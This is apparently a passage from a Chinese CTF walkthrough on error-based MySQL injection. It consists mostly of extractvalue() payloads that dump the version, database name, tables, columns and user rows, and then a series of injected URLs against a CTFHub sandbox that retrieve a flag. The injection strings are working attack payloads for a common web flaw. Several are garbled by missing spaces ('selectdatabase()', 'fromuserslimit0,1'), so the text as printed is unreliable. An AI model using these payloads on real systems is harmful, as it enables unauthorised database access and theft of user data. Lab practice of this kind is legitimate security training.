saul' and extractvalue(1,concat(0x7e,(select @@version),0x7e))#
2、数据库名
saul' and extractvalue(1,concat(0x7e,(selectdatabase()),0x7e))#
3、获取表名
saul' and extractvalue(1,concat(0x7e,(selectgroup_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))#
4、获取列名
saul' and extractvalue(1,concat(0x7e,(selectgroup_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'limit0,1),0x7e))#
5、获取数据
saul' and extractvalue(1,concat(0x7e,(select * from (select username fromuserslimit0,1) as a),0x7e))#
limit 0,1, 从你的表中的第0个数据开始,只读取一个;想读第二个那么就是这样:
saul' and extractvalue(1,concat(0x7e,(select * from (select username fromuserslimit1,1) as a),0x7e))#
http://challenge-0d31b44317053ed4.sandbox.ctfhub.com:10080/?id=-1 union select1,extractvalue(1,concat(0x7e,(selectgroup_concat(table_name) from information_schema.tables where table_schema=database()))) --+
这样就得到了两个表名:news,flag
5、爆所有字段名
http://challenge-0d31b44317053ed4.sandbox.ctfhub.com:10080/?id=-1 union select1,extractvalue(1,concat(0x7e,(selectgroup_concat(column_name) from information_schema.columns where table_name='flag'))) --+
得到了列名只有:flag
6、爆字段内容
http://challenge-0d31b44317053ed4.sandbox.ctfhub.com:10080/?id=-1 union select1,extractvalue(1,concat(0x7e,(select flag from flag))) --+